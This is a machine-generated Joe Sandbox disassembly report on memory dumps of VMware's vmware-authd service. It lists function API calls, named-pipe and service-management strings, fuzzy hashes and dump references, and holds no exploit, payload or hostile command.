Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: de1c8b7e428741581e77471916e87aa651dfd2a3d1ebcd9774e93273e2a02cf9
Instruction ID: 9b000ec7f0d2205eb059c30f670fbc1f33fc949d64159a8730082d8a8c9e836d
Opcode Fuzzy Hash: de1c8b7e428741581e77471916e87aa651dfd2a3d1ebcd9774e93273e2a02cf9
Instruction Fuzzy Hash: F6F0F6322501176ADB515AEB9C40F9B776CDFD2B70F214619FA24AA188DF30DCC1B1A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C5610 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6E0C56D9

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 07e9c1c150dc2c9e153e505ede2e213bcc39f56ebb35895667a474f0a425e16e
Instruction ID: 8fd113977b4c70e6488c7adf478c99b6cc8a59d4201a4bda51b7fd6302c5d17f
Opcode Fuzzy Hash: 07e9c1c150dc2c9e153e505ede2e213bcc39f56ebb35895667a474f0a425e16e
Instruction Fuzzy Hash: 27214A71900218DFEB50CF98D885FD9B7B8FB04714F1086BAE909AB380DB31A988CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6E1085D7 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 6E108611

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8992275e475ec9d0c6baaf03eda2ef181b1ff0abf7c22c7d818de907f281164d
Instruction ID: 3baf62375b00cf29ea65c6e94657a267f24d08992b120b24484ca91c87cafc3b
Opcode Fuzzy Hash: 8992275e475ec9d0c6baaf03eda2ef181b1ff0abf7c22c7d818de907f281164d
Instruction Fuzzy Hash: DD111571A0420AAFCF05CF98E94099B7BF9EF48304F114469F819AB251DB30EA11DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6E10BAE1 Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6E10BB44

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a00e17586b273fa1518f1a1a9afe3adaccc69d8fc6fd4df062a4122ab1c242b5
Instruction ID: 8fe9cf7293f26e183f0b8067f888cb68bd57838d31fbcb9002d2c920ab16f18a
Opcode Fuzzy Hash: a00e17586b273fa1518f1a1a9afe3adaccc69d8fc6fd4df062a4122ab1c242b5
Instruction Fuzzy Hash: B0012872C00159AFCF019FE89C00AEEBFB9FB18214F144565ED24E21A4EB318A61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1044C5 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,6E10F255,00000220,6E108B77,00013385,?,?,?,?,00000000,00000000,?,6E108B77), ref: 6E1044F7

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 87333d7720cf88eba8de2cdeeeb62b32ae0e592b5fac850b63615c420af1c949
Instruction ID: 578968c587664ae2f961f758ee315972b2b21bc8a318e7c8639085290b7db6a8
Opcode Fuzzy Hash: 87333d7720cf88eba8de2cdeeeb62b32ae0e592b5fac850b63615c420af1c949
Instruction Fuzzy Hash: 16E0E57914412256EE611AF6DC81B87764D9B627B0F210521FC21D65C4CF20C9C2A1A4

Uniqueness

Uniqueness Score: -1.00%

Function 6E10B828 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,6E10BC18,?,?,00000000,?,6E10BC18,00000000,0000000C), ref: 6E10B845

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f67764ea2d3f1326c83b68904c02c4c9465c1807107ce85bbc1ca9edd70bbb43
Instruction ID: b45e427c14d90c3ab929d26bd6936517cc95845646b98ba086cec98bd09ace85
Opcode Fuzzy Hash: f67764ea2d3f1326c83b68904c02c4c9465c1807107ce85bbc1ca9edd70bbb43
Instruction Fuzzy Hash: 21D06C3214020DBBDF028E84DD06EDA3FAAFB48714F018000BA1856020C732E821AB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C6A50 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,6E0C64A0,00000000,00000000,00000000), ref: 6E0C6A68

Memory Dump Source

Source File: 00000004.00000002.3263918937.000000006E0C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000004.00000002.3263878263.000000006E0C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264144885.000000006E179000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264184536.000000006E17A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.3264270374.000000006E17F000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6e0c0000_vmware-authd.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5e08ffc5e7a8e6b38b2c08f7378c931c77043db0bcc652fc93eaca690c6fe3df
Instruction ID: 35fa84b1dd3223f3be84a7291fa666b2d9956b40d2dc313ec95ade50d03c60ce
Opcode Fuzzy Hash: 5e08ffc5e7a8e6b38b2c08f7378c931c77043db0bcc652fc93eaca690c6fe3df
Instruction Fuzzy Hash: 55D012302E830876E6304691AD0BF9C33589700F25F20C014F6086D2C080F1B2996A6A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00484D00 Relevance: 231.9, APIs: 85, Strings: 47, Instructions: 878stringCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00484D45
memset.VCRUNTIME140(?,00000000,00001000), ref: 00484D63
Warning.VMWAREBASE(?,?,00000FFF,?,000003E8,?,00000000,00001000), ref: 00484D81
GetLastError.KERNEL32 ref: 00484D8D
Warning.VMWAREBASE(00000000), ref: 00484D94
Warning.VMWAREBASE(?,00000400,transaction on named pipe timeout: %s (%d),00000000,00000000), ref: 00484DAB
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000400,transaction on named pipe timeout: %s (%d),00000000,00000000), ref: 00484DB1
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,localconnect,0000000C), ref: 00484DE5
Warning.VMWAREBASE(?,00001000,%s %d,LOCALCONNECT), ref: 00484E0E
Warning.VMWAREBASE(?,?,?,?,000003E8), ref: 00484E3E
GetLastError.KERNEL32 ref: 00484E4E
Warning.VMWAREBASE(?,00000400,Malformed request from client: %s,?), ref: 004853A9
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000400,Malformed request from client: %s,?), ref: 004853B0
CloseHandle.KERNEL32(?), ref: 004858C0
Warning.VMWAREBASE(?,00001000,%s %s,ERROR,00000000), ref: 004858E7
Warning.VMWAREBASE(?,?,?,?,000003E8), ref: 00485916
GetLastError.KERNEL32 ref: 00485922

Strings

Error %d while duplicating token., xrefs: 00484EC0
, xrefs: 0048578C
%s-fd, xrefs: 00485522
%s %d %s, xrefs: 00484F13
startservice, xrefs: 00485775
opensecurable, xrefs: 00485199
testAutomation, xrefs: 0048551D
%d %d %d %d %d %d, xrefs: 0048524F
|, xrefs: 004851F1
"%s" -T querytoken %s, xrefs: 004850FD
localconnect, xrefs: 00484DDF
%d %d, xrefs: 0048544C
TLOCALCONNECT, xrefs: 00484F0E
Unrecognized command: %s., xrefs: 0048586F
%s: Denying opensecurable access: pid %d != pid %d, xrefs: 004853CF
LOCALCONNECT, xrefs: 00484DFE
TOKEN, xrefs: 0048533C
Process '%s' created with pid %d, xrefs: 0048514F
ERROR, xrefs: 004858D1
Error %d while sending OK reply, xrefs: 004857FE
Error %d while sending ERROR reply, xrefs: 00485929
vmware-vmx.exe, xrefs: 004850C6, 004850E6
%s: GetNamedPipeClientProcessId failed: %d, xrefs: 004852A5
openvmautomation, xrefs: 004853EE
, xrefs: 0048542F
OpenSecurable: FILE_FLAG_DELETE_ON_CLOSE disallowed, xrefs: 004852F7
%s 0x%x, xrefs: 00485341
tlocalconnect, xrefs: 00484E61
VMAUTOMATION, xrefs: 004856B5
Debug, xrefs: 004850B3, 004850BB
Stats, xrefs: 004850AE
transaction on named pipe timeout: %s (%d), xrefs: 00484D9A
Cannot connect to VMX: %s, xrefs: 0048567B, 004856FC
%s , xrefs: 004856BA
OpenSecurable: must open with OPEN_EXISTING, xrefs: 004852E3
ValidatePipeClientPid, xrefs: 004852A0, 004853CA
vmexecstats, xrefs: 0048501A, 0048502D
Malformed request from client: %s, xrefs: 00485207, 00485277, 00485466
Error %d while sending local connect params reply, xrefs: 00484E55, 00484F65, 00485763
OpenSecurable pipe client security check failed, xrefs: 004852B2, 004853DC
%s VMX was requested, but not present. Using standard VMX., xrefs: 004850BC
%s %d, xrefs: 00484E03
vmexecdebug, xrefs: 00484FF0, 00485003
OpenSecurable: must open with share read/write/delete, xrefs: 004853BE
%s %s, xrefs: 004858D6
vmexec, xrefs: 00484FA0, 00484FCA
Error %d while sending PID reply, xrefs: 00485398

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$freememset$CloseHandlestrncmp
String ID: $ $"%s" -T querytoken %s$%d %d$%d %d %d %d %d %d$%s $%s %d$%s %d %s$%s %s$%s 0x%x$%s VMX was requested, but not present. Using standard VMX.$%s-fd$%s: Denying opensecurable access: pid %d != pid %d$%s: GetNamedPipeClientProcessId failed: %d$Cannot connect to VMX: %s$Debug$ERROR$Error %d while duplicating token.$Error %d while sending ERROR reply$Error %d while sending OK reply$Error %d while sending PID reply$Error %d while sending local connect params reply$LOCALCONNECT$Malformed request from client: %s$OpenSecurable pipe client security check failed$OpenSecurable: FILE_FLAG_DELETE_ON_CLOSE disallowed$OpenSecurable: must open with OPEN_EXISTING$OpenSecurable: must open with share read/write/delete$Process '%s' created with pid %d$Stats$TLOCALCONNECT$TOKEN$Unrecognized command: %s.$VMAUTOMATION$ValidatePipeClientPid$localconnect$opensecurable$openvmautomation$startservice$testAutomation$tlocalconnect$transaction on named pipe timeout: %s (%d)$vmexec$vmexecdebug$vmexecstats$vmware-vmx.exe$|
API String ID: 2975413436-463879127
Opcode ID: e7fe98dec843a30cd5d1165f28f3e287d946d821aca280a128a1a91ca4ddac75
Instruction ID: 0a0b082c8c10ea817d27f057e60ae4e9e4d8c9aed78e3f2016b0762d55eb788b
Opcode Fuzzy Hash: e7fe98dec843a30cd5d1165f28f3e287d946d821aca280a128a1a91ca4ddac75
Instruction Fuzzy Hash: E862FB71900714AEDB22BB648C45FEE73BCEB04705F0449EBFA09A2181DB789F558F59

Uniqueness

Uniqueness Score: -1.00%

Function 00484850 Relevance: 89.5, APIs: 39, Strings: 12, Instructions: 253memorypipeCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(004845FC,00000001,0000000B,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00484892
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,00000001,?,?,?,?,?,?,?,?,004845FC), ref: 0048489F
InitializeAcl.ADVAPI32(00000000,00000400,00000002,?,?,?,?,?,?,?,?,004845FC), ref: 004848CF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004845FC), ref: 004848D9
Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,004845FC), ref: 004848E0
FreeSid.ADVAPI32(?), ref: 00484A6D
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00484A78
LocalFree.KERNEL32(00000000), ref: 00484A86
CloseHandle.KERNEL32(00000000), ref: 00484A91
ConnectNamedPipe.KERNEL32(00000000,?), ref: 00484AC6
GetLastError.KERNEL32 ref: 00484AD0
GetLastError.KERNEL32 ref: 00484ADD
Warning.VMWAREBASE(00000000), ref: 00484AE4
CloseHandle.KERNEL32(00000000), ref: 00484AA2

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

FreeSid.ADVAPI32(?), ref: 00484B14
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00484B1B
LocalFree.KERNEL32(00000000), ref: 00484B25

Strings

SetSecurityDescriptorDacl failed: %s (%d) , xrefs: 004849A6
Generated ACL is invalid: %s (%d) , xrefs: 00484934
Could not create event for overlapped IO: %s (%d) , xrefs: 00484A56
Could not initialize ACL: %s (%d) , xrefs: 004848E6
LocalAlloc pSD failed while creating pipe, xrefs: 00484951
Could not add sid to ACL: %s (%d) , xrefs: 00484912
\\.\pipe\vmware-authdpipe, xrefs: 004849F5
Generated SD is invalid: %s (%d) , xrefs: 004849C8
CreateNamedPipe failed: %s (%d) , xrefs: 00484A1A
Could not allocate %d bytes for ACL, xrefs: 004848B3
InitializeSecurityDescriptor failed: %s (%d) , xrefs: 0048497F
ConnectNamedPipe failed: %s (%d) , xrefs: 00484AEA

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: ErrorLast$FreeWarning$CloseHandleInitializeLocalfree$AllocateConnectNamedPipe_printfcalloc
String ID: ConnectNamedPipe failed: %s (%d) $Could not add sid to ACL: %s (%d) $Could not allocate %d bytes for ACL$Could not create event for overlapped IO: %s (%d) $Could not initialize ACL: %s (%d) $CreateNamedPipe failed: %s (%d) $Generated ACL is invalid: %s (%d) $Generated SD is invalid: %s (%d) $InitializeSecurityDescriptor failed: %s (%d) $LocalAlloc pSD failed while creating pipe$SetSecurityDescriptorDacl failed: %s (%d) $\\.\pipe\vmware-authdpipe
API String ID: 1190025680-572978193
Opcode ID: 92d34c21446f8e542e1f2115dc485c8e3e9092e480a03b14427979a481d8bb71
Instruction ID: b7e741053e34203266ab7c524b791f7b815d7bd11f710607852aab7040142aeb
Opcode Fuzzy Hash: 92d34c21446f8e542e1f2115dc485c8e3e9092e480a03b14427979a481d8bb71
Instruction Fuzzy Hash: A9818571A40201ABE711BFB59C49F6F77A8EB45B09F104D2FFA01E6191D7BC8910876E

Uniqueness

Uniqueness Score: -1.00%

Function 00486810 Relevance: 86.0, APIs: 34, Strings: 15, Instructions: 281COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000020,00000001,00000000), ref: 00486871
GetCurrentProcess.KERNEL32(?), ref: 0048689B
GetCurrentProcess.KERNEL32 ref: 004868A3
DuplicateHandle.KERNEL32(00000000,?,00000000,00000004,00000000,00000000,00000002), ref: 004868B8
GetLastError.KERNEL32 ref: 004868C2
DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00486B44
DestroyEnvironmentBlock.USERENV(00000000,?,00000000), ref: 00486B54
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000), ref: 00486B76
UnloadUserProfile.USERENV(?,?,?,00000000), ref: 00486B91
CloseHandle.KERNEL32(?,?,00000000), ref: 00486BA1
free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001), ref: 00486BAF

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

GetLastError.KERNEL32 ref: 00486BCE

Part of subcall function 00482700: Warning.VMWAREBASE(?,00001000,?,00486E9C,?,00486E9C,RevertToSelf failed: %d,00000000), ref: 0048273F

Strings

GetUserName failed: %d, xrefs: 00486948
GetEnvironmentStrings() failed: %d, xrefs: 004869BC
ImpersonateLoggedOnUser failed: %d, xrefs: 00486905
The system environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 004869EF
LoadUserProfile failed: %d, xrefs: 00486A37
DuplicateHandle failed: %d, xrefs: 004868C9
is NOT, xrefs: 00486988
(Account %s administrator), xrefs: 00486996
, xrefs: 004868E3
RevertToSelf failed: %d, xrefs: 00486BD5
calloc failed, xrefs: 00486880
CreateEnvironmentBlock(NULL) failed: %d, xrefs: 00486A0A
CreateEnvironmentBlock(hToken) failed: %d, xrefs: 00486A86
Your environment block appears to be corrupted. Please fix your environment block and try again., xrefs: 00486A6E
CreateLogonSession: spawn with username: %s, xrefs: 0048696F

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: ErrorLast$Warning$BlockCurrentDestroyEnvironmentHandleProcessfree$CloseDuplicateProfileUnloadUser_printfcalloc
String ID: $ (Account %s administrator)$CreateEnvironmentBlock(NULL) failed: %d$CreateEnvironmentBlock(hToken) failed: %d$CreateLogonSession: spawn with username: %s$DuplicateHandle failed: %d$GetEnvironmentStrings() failed: %d$GetUserName failed: %d$ImpersonateLoggedOnUser failed: %d$LoadUserProfile failed: %d$RevertToSelf failed: %d$The system environment block appears to be corrupted. Please fix your environment block and try again.$Your environment block appears to be corrupted. Please fix your environment block and try again.$calloc failed$is NOT
API String ID: 943474365-2635470652
Opcode ID: c423a479e7adff75f0061961c769a12f588d3927c9431a3a9b698cd388a28535
Instruction ID: 7c9a54c5c318d5da5706fcf27abc2172d7aafec5953e55292400506eb4dc9149
Opcode Fuzzy Hash: c423a479e7adff75f0061961c769a12f588d3927c9431a3a9b698cd388a28535
Instruction Fuzzy Hash: ADA10B719002109BDB207F619C49B6E77F8FF05708F05896BF945E6281DBBC9D40CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00485C70 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 221sleepserviceCOMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,?,VMAuthdStartService failed to lookup service tag: %s,?,?,?,00000000), ref: 00485CEC
Warning.VMWAREBASE(00000000,00000000,000F003F,?,?,00000000), ref: 00485D10
GetLastError.KERNEL32(?,?,00000000), ref: 00485D1C
Warning.VMWAREBASE(00000000,?,00000000), ref: 00485D23
Warning.VMWAREBASE(?,?,OpenSCManager failed: %s (%d),00000000,00000000,?,00000000), ref: 00485D35
Warning.VMWAREBASE(00000000,00000000,00000014,?,?,00000000), ref: 00485D54
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00485D62
Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00485D69
Warning.VMWAREBASE(?,?,StartService(%s) failed: %s (%d),00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00485D7C
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00485D9C
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00485DA6
Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00485DB4
GetTickCount.KERNEL32 ref: 00485DC2
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00000000), ref: 00485DD1
GetTickCount.KERNEL32 ref: 00485DEC
GetTickCount.KERNEL32 ref: 00485E04
Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 00485E43
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000), ref: 00485E4E
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00485E58
Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00485E5F
Warning.VMWAREBASE(?,?,QueryServiceStatus failed: %s (%d),00000000,00000000,?,?,?,?,?,00000000), ref: 00485E72
Warning.VMWAREBASE(?,?,WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d,?,?,?,?,?,?,00000000), ref: 00485EA9

Strings

VMAuthdStartService failed to start service %s: Expected service state %d, got %d, xrefs: 00485E88
StartService(%s) failed: %s (%d), xrefs: 00485DBB
VMAuthdStartService failed to lookup service tag: %s, xrefs: 00485CE3
OpenService(%s) failed: %s (%d), xrefs: 00485D70
QueryServiceStatus failed: %s (%d), xrefs: 00485E6B
WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d, xrefs: 00485EA2
OpenSCManager failed: %s (%d), xrefs: 00485D2C

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$CountServiceTick$QueryStatus$SleepStart
